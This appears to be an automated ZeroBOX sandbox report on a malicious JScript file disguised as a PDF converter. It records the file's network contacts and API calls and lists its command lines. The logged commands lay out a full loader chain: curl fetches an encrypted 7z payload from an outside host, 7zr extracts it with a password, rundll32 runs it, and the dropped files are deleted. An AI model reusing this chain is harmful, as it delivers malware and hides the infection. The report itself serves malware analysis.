popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

convert-pdf-539.js

Generic Malware UPX Malicious Library Malicious Packer PE File OS Processor Check PE32
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6402 Sept. 14, 2023, 2:30 p.m. Sept. 14, 2023, 2:33 p.m.
Size 43.1KB
Type ASCII text
MD5 0d5009570d1773ecfccf17e6fd65edba
SHA256 bb8ab5d49c2c627362f637dff74ef05446768c84cecc8e37f50fdf70f05e8474
CRC32 1020B648
ssdeep 768:u7wf0Sj3be+hrOrA2hPMye6jEtcfvf8R21nR/LumFaEoPnLxW9:u7wf0e3Z4PXwY
Yara None matched

Name Response Post-Analysis Lookup
restohalto.site
www.7-zip.org
A 49.12.202.237
49.12.202.237
x311.com
A 209.59.190.160
209.59.190.160
IP Address Status Action
164.124.101.2 Active Moloch
209.59.190.160 Active Moloch
49.12.202.237 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

Flow Issuer Subject Fingerprint
TLS 1.3
192.168.56.102:49169
209.59.190.160:443 		None None None
TLS 1.3
192.168.56.102:49173
49.12.202.237:443 		None None None

Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp>
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: curl
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: https://x311.com/font-awesome/css/4448.7z --output "C:\Users\test22\AppData\Local\Temp\cumque.h" --ssl-no-revoke --insecure --location
console_handle: 0x00000007
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
Time & API Arguments Status Return Repeated

bind

 ip_address: 127.0.0.1
socket: 144
port: 0
1 0 0

listen

 socket: 144
backlog: 1
1 0 0

accept

 ip_address:
socket: 144
port: 0
1 152 0

bind

 ip_address: 127.0.0.1
socket: 144
port: 0
1 0 0

listen

 socket: 144
backlog: 1
1 0 0

accept

 ip_address:
socket: 144
port: 0
1 152 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 2616
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefa1b7000
process_handle: 0xffffffffffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\voluptatem.l.bat
cmdline cmd.exe /c "C:\Users\test22\AppData\Local\Temp\voluptatem.l.bat"
cmdline "C:\Windows\System32\cmd.exe" /c ren "C:\Users\test22\AppData\Local\Temp\voluptatem.let.w" "voluptatem.l"
cmdline "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\cumque.h"
cmdline cmd.exe /c ""C:\Users\test22\AppData\Local\Temp\et.o" -pMAJbyaYNzUQneWhU@23 e -so "C:\Users\test22\AppData\Local\Temp\cumque.h" > "C:\Users\test22\AppData\Local\Temp\voluptatem.let.w""
cmdline "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\convert-pdf-539.js"
cmdline cmd.exe /c ren "C:\Users\test22\AppData\Local\Temp\voluptatem.let.w" "voluptatem.l"
cmdline cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\convert-pdf-539.js"
cmdline cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\cumque.h"
cmdline "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\et.o"
cmdline "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\voluptatem.l.bat"
cmdline "C:\Windows\System32\cmd.exe" /c ""C:\Users\test22\AppData\Local\Temp\et.o" -pMAJbyaYNzUQneWhU@23 e -so "C:\Users\test22\AppData\Local\Temp\cumque.h" > "C:\Users\test22\AppData\Local\Temp\voluptatem.let.w""
cmdline cmd.exe /c echo curl https://x311.com/font-awesome/css/4448.7z --output "C:\Users\test22\AppData\Local\Temp\cumque.h" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\voluptatem.l.bat"
cmdline "C:\Windows\System32\cmd.exe" /c echo curl https://x311.com/font-awesome/css/4448.7z --output "C:\Users\test22\AppData\Local\Temp\cumque.h" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\voluptatem.l.bat"
cmdline cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\et.o"
cmdline "C:\Windows\System32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\voluptatem.l.bat"
cmdline cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\voluptatem.l.bat"
file C:\Users\test22\AppData\Local\Temp\et.o
Time & API Arguments Status Return Repeated

ShellExecuteExW

 show_type: 0
filepath_r: cmd.exe
parameters: /c del "C:\Users\test22\AppData\Local\Temp\convert-pdf-539.js"
filepath: cmd.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: cmd.exe
parameters: /c echo curl https://x311.com/font-awesome/css/4448.7z --output "C:\Users\test22\AppData\Local\Temp\cumque.h" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\voluptatem.l.bat"
filepath: cmd.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: cmd.exe
parameters: /c "C:\Users\test22\AppData\Local\Temp\voluptatem.l.bat"
filepath: cmd.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: curl
parameters: https://www.7-zip.org/a/7zr.exe --output "C:\Users\test22\AppData\Local\Temp\et.o"
filepath: curl
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: cmd.exe
parameters: /c ""C:\Users\test22\AppData\Local\Temp\et.o" -pMAJbyaYNzUQneWhU@23 e -so "C:\Users\test22\AppData\Local\Temp\cumque.h" > "C:\Users\test22\AppData\Local\Temp\voluptatem.let.w""
filepath: cmd.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: cmd.exe
parameters: /c del "C:\Users\test22\AppData\Local\Temp\et.o"
filepath: cmd.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: cmd.exe
parameters: /c del "C:\Users\test22\AppData\Local\Temp\cumque.h"
filepath: cmd.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: cmd.exe
parameters: /c ren "C:\Users\test22\AppData\Local\Temp\voluptatem.let.w" "voluptatem.l"
filepath: cmd.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: rundll32
parameters: "C:\Users\test22\AppData\Local\Temp\voluptatem.l", scab /k arbalet875
filepath: rundll32
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: cmd.exe
parameters: /c del "C:\Users\test22\AppData\Local\Temp\voluptatem.l.bat"
filepath: cmd.exe
1 1 0
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeRestorePrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeSecurityPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeSecurityPrivilege
1 1 0
cmdline "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\cumque.h"
cmdline "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\convert-pdf-539.js"
cmdline cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\convert-pdf-539.js"
cmdline cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\cumque.h"
cmdline "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\et.o"
cmdline "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\voluptatem.l.bat"
cmdline cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\et.o"
cmdline cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\voluptatem.l.bat"
file C:\Users\test22\AppData\Local\Temp\voluptatem.l.bat
file C:\Users\test22\AppData\Local\Temp\cumque.h
file C:\Users\test22\AppData\Local\Temp\et.o
parent_process wscript.exe martian_process cmd.exe /c echo curl https://x311.com/font-awesome/css/4448.7z --output "C:\Users\test22\AppData\Local\Temp\cumque.h" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\voluptatem.l.bat"
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\voluptatem.l.bat"
parent_process wscript.exe martian_process cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\convert-pdf-539.js"
parent_process wscript.exe martian_process curl https://www.7-zip.org/a/7zr.exe --output "C:\Users\test22\AppData\Local\Temp\et.o"
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\et.o"
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c echo curl https://x311.com/font-awesome/css/4448.7z --output "C:\Users\test22\AppData\Local\Temp\cumque.h" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\voluptatem.l.bat"
parent_process wscript.exe martian_process cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\cumque.h"
parent_process wscript.exe martian_process cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\et.o"
parent_process wscript.exe martian_process cmd.exe /c "C:\Users\test22\AppData\Local\Temp\voluptatem.l.bat"
parent_process wscript.exe martian_process rundll32 "C:\Users\test22\AppData\Local\Temp\voluptatem.l", scab /k arbalet875
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\voluptatem.l.bat"
parent_process wscript.exe martian_process "C:\util\curl\curl.exe" https://www.7-zip.org/a/7zr.exe --output "C:\Users\test22\AppData\Local\Temp\et.o"
parent_process wscript.exe martian_process cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\voluptatem.l.bat"
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c ren "C:\Users\test22\AppData\Local\Temp\voluptatem.let.w" "voluptatem.l"
parent_process wscript.exe martian_process "C:\Windows\System32\rundll32.exe" "C:\Users\test22\AppData\Local\Temp\voluptatem.l", scab /k arbalet875
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\cumque.h"
parent_process wscript.exe martian_process cmd.exe /c ""C:\Users\test22\AppData\Local\Temp\et.o" -pMAJbyaYNzUQneWhU@23 e -so "C:\Users\test22\AppData\Local\Temp\cumque.h" > "C:\Users\test22\AppData\Local\Temp\voluptatem.let.w""
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\convert-pdf-539.js"
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c ""C:\Users\test22\AppData\Local\Temp\et.o" -pMAJbyaYNzUQneWhU@23 e -so "C:\Users\test22\AppData\Local\Temp\cumque.h" > "C:\Users\test22\AppData\Local\Temp\voluptatem.let.w""
parent_process wscript.exe martian_process cmd.exe /c ren "C:\Users\test22\AppData\Local\Temp\voluptatem.let.w" "voluptatem.l"
file C:\Windows\System32\cmd.exe
file C:\util\curl\curl.exe
file C:\Windows\System32\rundll32.exe